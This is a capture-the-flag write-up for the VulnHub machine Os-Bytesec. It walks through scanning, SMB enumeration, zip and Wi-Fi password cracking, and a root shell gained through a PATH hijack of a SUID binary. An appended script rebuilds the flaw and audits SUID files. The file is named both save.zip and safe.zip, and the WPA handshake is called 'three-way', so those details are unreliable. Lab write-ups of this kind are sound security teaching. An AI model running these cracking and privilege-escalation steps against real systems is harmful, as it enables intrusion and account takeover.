[VULNHUB] Os-Bytesec
Setup
I run the VM using VirtualBox with a bridged adapter. Some machines require a specific hostname in /etc/hosts. Otherwise, you can add the machine's IP address to /etc/hosts to make things easier and simpler. Here I used bytesec.vh as the machine's hostname.
Information Gathering
NMAP
nmap -sV -sC -p- bytesec.vh -oN initial.nmap -v
PORT STATE SERVICE VERSION
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
|_http-favicon: Unknown favicon MD5: 5ECF6AFD7D00CCBE6B3C7AA8FD31BDE8
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Hacker_James
139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp open netbios-ssn Samba smbd 4.3.11-Ubuntu (workgroup: WORKGROUP)
2525/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.7 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 12:55:4f:1e:e9:7e:ea:87:69:90:1c:1f:b0:63:3f:f3 (RSA)
| 256 a6:70:f1:0e:df:4e:73:7d:71:42:d6:44:f1:2f:24:d2 (ECDSA)
|_ 256 f0:f8:fd:24:65:07:34:c2:d4:9a:1f:c0:b8:2e:d8:3a (ED25519)
MAC Address: 08:00:27:B3:78:46 (Oracle VirtualBox virtual NIC)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
The server runs HTTP at port 80, SMB at 139 and 445, and SSH at 2525.
GOBUSTER
gobuster dir -u http://bytesec.vh -w /usr/share/wordlists/dirb/big.txt
/.htaccess (Status: 403)
/.htpasswd (Status: 403)
/css (Status: 301)
/gallery (Status: 301)
/html (Status: 301)
/img (Status: 301)
/js (Status: 301)
/news (Status: 301)
/server-status (Status: 403)
Nothing really interesting. But I found this image in /img.
Does this machine have the BlueKeep vulnerability? 😕
BlueKeep is a remote code execution vulnerability that exists in Remote Desktop Services — formerly known as Terminal Services — when an unauthenticated attacker connects to the target system using RDP and sends specially crafted requests. This vulnerability is pre-authentication and requires no user interaction. An attacker who successfully exploited this vulnerability could execute arbitrary code on the target system. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights. (microsoft)
ENUM4LINUX
Enum4linux is a tool for enumerating information from Windows and Samba systems. It is written in Perl and is basically a wrapper around the Samba tools smbclient, rpcclient, net, and nmblookup.
We use enum4linux to gather information such as the domain, the OS running on the host, the SMB version, and even the users inside a domain.
[+] Enumerating users using SID S-1-22-1 and logon username '', password ''
S-1-22-1-1000 Unix User\sagar (Local User)
S-1-22-1-1001 Unix User\blackjax (Local User)
S-1-22-1-1002 Unix User\smb (Local User)
SMBCLIENT
From the result of enum4linux above, we got 3 users. After trying to log in with each username, the user smb is the only one able to log in (with an empty password).
smbclient //bytesec.vh/smb -U smb -N
Download save.zip.
FCRACKZIP
It turns out that save.zip is locked with a password; we can try to brute-force it using fcrackzip.
fcrackzip -D -p /usr/share/wordlists/rockyou.txt -u safe.zip
And we got our password cracked.
PASSWORD FOUND!!!!: pw == hacker1smb:
The content of save.zip is one image named secret.jpg, which contains no "secret", and a packet capture file named user.cap.
After examining user.cap for a while, we see lots of deauth packets. We can assume that this is a packet capture from someone trying to capture the three-way handshake between a wifi client and the access point (using airodump / aireplay). We can use aircrack to crack the captured three-way handshake.
aircrack-ng -w /usr/share/wordlists/rockyou.txt user.cap
snowflake is the wifi password.
Exploitation
User Flag
We can ssh to port 2525 using the ESSID from user.cap (blackjax) as the username and the cracked password (snowflake).
Root Flag
Next we can do system enumeration using LinEnum.sh. Make sure to run the script from an rwx directory such as /tmp.
[-] SUID files:
.
.
-rwsr-xr-x 1 root root 7432 Nov 4 20:00 /usr/bin/netscan
One particularly interesting point is a file (or script?) named netscan which has the SUID/SETUID bit set. The SUID/SETUID bit means the file runs with the permissions of its owner (root here) without us providing any password. Also, netscan is a file that usually does not exist on other normal systems.
Netscan
It turns out that netscan is actually a "script" that runs netstat, created by someone just to output the established connections. With that logic in mind, we can trick the system by "changing" the netstat file.
Privilege Escalation
1. Create a file named netstat in /tmp.
echo "/bin/sh" > netstat
2. Add the /tmp directory to $PATH.
export PATH=/tmp:$PATH
3. Run netscan.
And we get the root 😃
So how does it work?
Basically we manipulate the flow of the netscan script. The script is supposed to call the real netstat, which is a tool to show all active connections, but because we overwrite the environment variable ($PATH), the script calls the fake netstat in /tmp instead.
Actually, overwriting $PATH alone is not enough to gain privilege escalation. But because netscan has the SUID bit, it invokes our fake netstat, and therefore the shell, as root.
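To show the same PATH-resolution defect next to its fix, here is an added example that is not part of the original write-up: it rebuilds the netscan situation in a scratch directory with constructed stand-ins for /usr/bin, /tmp and netstat (which only echo a marker), and adds a small SUID audit that would have flagged an unexpected file such as /usr/bin/netscan.

```shell
#!/bin/sh
# Added example, not from the original write-up. It rebuilds the netscan
# situation in a scratch directory: a wrapper that resolves "netstat" through
# $PATH next to one that pins PATH and the binary, plus an audit that lists
# SUID files missing from a baseline. Every path and file below is a
# constructed stand-in, so it runs as an unprivileged user.
set -u

WORK=$(mktemp -d)
TRUSTED="$WORK/usr/bin"      # stands in for the real /usr/bin
WRITABLE="$WORK/tmp"         # stands in for the world-writable /tmp
mkdir -p "$TRUSTED" "$WRITABLE"

# The "real" tool and the one dropped in the writable directory; each only
# echoes a marker, which is enough to show which binary actually ran.
printf '#!/bin/sh\necho REAL\n' > "$TRUSTED/netstat"
printf '#!/bin/sh\necho FAKE\n' > "$WRITABLE/netstat"
chmod +x "$TRUSTED/netstat" "$WRITABLE/netstat"

# Same defect as netscan on the box: the command is resolved through whatever
# PATH the caller supplies, so a writable directory listed first wins.
vulnerable_netscan() {
    netstat
}

# Hardened wrapper: discard the caller's PATH and call the tool by absolute
# path. A SUID program must never trust PATH (sudo's secure_path does this).
hardened_netscan() {
    PATH="$TRUSTED:/usr/sbin:/usr/bin:/sbin:/bin"; export PATH
    "$TRUSTED/netstat"
}

# Runs FUNCTION with the writable dir first in PATH, mirroring the write-up's
# "export PATH=/tmp:$PATH", inside a subshell so nothing leaks out.
with_hijacked_path() {    # with_hijacked_path FUNCTION
    ( PATH="$WRITABLE:$PATH"; export PATH; "$1" )
}

# Defender check: SUID regular files under ROOT that are not in BASELINE_FILE.
# Run against a known-good list, this flags a new SUID file the day it appears.
audit_suid() {            # audit_suid ROOT BASELINE_FILE
    find "$1" -type f -perm -4000 2>/dev/null | sort | grep -vxF -f "$2"
}

# Fixture for the audit: one expected SUID file and one unexpected one.
printf '#!/bin/sh\n' > "$TRUSTED/passwd"
printf '#!/bin/sh\n' > "$TRUSTED/netscan"
chmod u+s,+x "$TRUSTED/passwd" "$TRUSTED/netscan"
printf '%s\n' "$TRUSTED/passwd" > "$WORK/baseline.txt"
```

Running with_hijacked_path vulnerable_netscan prints FAKE while with_hijacked_path hardened_netscan prints REAL, and audit_suid "$WORK" "$WORK/baseline.txt" lists only the unexpected netscan stand-in.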
That's for today, hope you guys like it *Dave Lee voice* 👋